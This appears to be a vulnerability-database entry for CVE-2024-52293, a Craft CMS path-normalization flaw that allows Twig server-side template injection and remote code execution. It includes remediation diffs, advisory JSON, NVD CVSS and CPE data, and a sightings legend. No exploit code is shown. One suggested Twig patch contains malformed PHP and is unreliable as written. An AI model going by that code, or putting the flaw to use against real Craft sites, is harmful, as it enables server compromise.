Remediation\n\n```diff\ndiff --git a/src/helpers/FileHelper.php b/src/helpers/FileHelper.php\nindex 0c2da884a7..ac23ce556a 100644\n--- a/src/helpers/FileHelper.php\n+++ b/src/helpers/FileHelper.php\n@@ -133,7 +133,7 @@ class FileHelper extends \\yii\\helpers\\FileHelper\n $from = static::absolutePath($from, ds: $ds);\n }\n\n- return $from . $ds . $to;\n+ return FileHelper::normalizePath($from . $ds . $to);\n }\n\n /**\n```\n\n\n\nSee [twigphp/Twig/src/Extension/CoreExtension.php](https://github.com/twigphp/Twig/blob/a3496d148b75e270065ed8f03758f7b09b3a9793/src/Extension/CoreExtension.php) for updated filters and operators, a possible fix could look like:\n\n```diff\ndiff --git a/src/web/twig/Extension.php b/src/web/twig/Extension.php\nindex efff2d2412..756f452f8b 100644\n--- a/src/web/twig/Extension.php\n+++ b/src/web/twig/Extension.php\n@@ -225,6 +225,9 @@ class Extension extends AbstractExtension implements GlobalsInterface\n new TwigFilter(\u0027lcfirst\u0027, [$this, \u0027lcfirstFilter\u0027]),\n new TwigFilter(\u0027literal\u0027, [$this, \u0027literalFilter\u0027]),\n new TwigFilter(\u0027map\u0027, [$this, \u0027mapFilter\u0027], [\u0027needs_environment\u0027 =\u003e true]),\n+ new TwigFilter(\u0027find\u0027, [$this, \u0027find\u0027], [\u0027needs_environment\u0027 =\u003e true]),\n+ new TwigFilter(\u0027has some\u0027 =\u003e [\u0027precedence\u0027 =\u003e 20, \u0027class\u0027 =\u003e HasSomeBinary::class, \u0027associativity\u0027 =\u003e ExpressionParser::OPERATOR_LEFT]),\n+ new TwigFilter(\u0027has every\u0027 =\u003e [\u0027precedence\u0027 =\u003e 20, \u0027class\u0027 =\u003e HasEveryBinary::class, \u0027associativity\u0027 =\u003e ExpressionParser::OPERATOR_LEFT]),\n new TwigFilter(\u0027markdown\u0027, [$this, \u0027markdownFilter\u0027], [\u0027is_safe\u0027 =\u003e [\u0027html\u0027]]),\n new TwigFilter(\u0027md\u0027, [$this, \u0027markdownFilter\u0027], [\u0027is_safe\u0027 =\u003e [\u0027html\u0027]]),\n new TwigFilter(\u0027merge\u0027, [$this, \u0027mergeFilter\u0027]),\n```\n\n\n\n### Impact\n\nTake control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.\n\nAlthough the vulnerability is exploitable only in the authenticated users, configuration with `ALLOW_ADMIN_CHANGES=true`, there is still a potential security threat (Remote Code Execution)",
"id": "GHSA-f3cw-hg6r-chfv",
"modified": "2025-07-16T21:01:41Z",
"published": "2024-11-13T14:16:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52293"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/commit/123e48a696de1e2f63ab519d4730eb3b87beaa58"
},
{
"type": "PACKAGE",
"url": "https://github.com/craftcms/cms"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Craft CMS vulnerable to Potential Remote Code Execution via missing path normalization \u0026 Twig SSTI"
}
FKIE_CVE-2024-52293
Vulnerability from fkie_nvd - Published: 2024-11-13 16:15 - Updated: 2024-11-19 17:51
Severity ?
7.2 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
7.2 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
7.2 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Summary
Craft is a content management system (CMS). Prior to 4.12.2 and 5.4.3, Craft is missing normalizePath in the function FileHelper::absolutePath could lead to Remote Code Execution on the server via twig SSTI. This is a sequel to CVE-2023-40035. This vulnerability is fixed in 4.12.2 and 5.4.3.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B60EC9DE-A344-4BB8-AFBE-6202650BC911",
"versionEndExcluding": "4.12.2",
"versionStartExcluding": "4.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "03536C8C-DA2C-4758-A05E-EBFB10B04657",
"versionEndExcluding": "5.4.3",
"versionStartExcluding": "5.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "CC2F40FC-7C27-456A-B16D-679410D1D5CF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:rc2:*:*:*:*:*:*",
"matchCriteriaId": "FBAA8227-04F8-404C-907B-B0162B325F5A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:rc3:*:*:*:*:*:*",
"matchCriteriaId": "21B28E2C-327A-4CE6-ACAD-97E459712A55",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:craftcms:craft_cms:5.0.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "8D8E02D1-601A-4E2B-B619-4775BFDB72D0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Craft is a content management system (CMS). Prior to 4.12.2 and 5.4.3, Craft is missing normalizePath in the function FileHelper::absolutePath could lead to Remote Code Execution on the server via twig SSTI. This is a sequel to CVE-2023-40035. This vulnerability is fixed in 4.12.2 and 5.4.3."
},
{
"lang": "es",
"value": "Craft es un sistema de gesti\u00f3n de contenido (CMS). Antes de las versiones 4.12.2 y 5.4.3, Craft no ten\u00eda normalizePath en la funci\u00f3n FileHelper::absolutePath, lo que pod\u00eda provocar la ejecuci\u00f3n remota de c\u00f3digo en el servidor a trav\u00e9s de twig SSTI. Esta es una secuela de CVE-2023-40035. Esta vulnerabilidad se ha corregido en las versiones 4.12.2 y 5.4.3."
}
],
"id": "CVE-2024-52293",
"lastModified": "2024-11-19T17:51:39.460",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2024-11-13T16:15:19.307",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/craftcms/cms/commit/123e48a696de1e2f63ab519d4730eb3b87beaa58"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…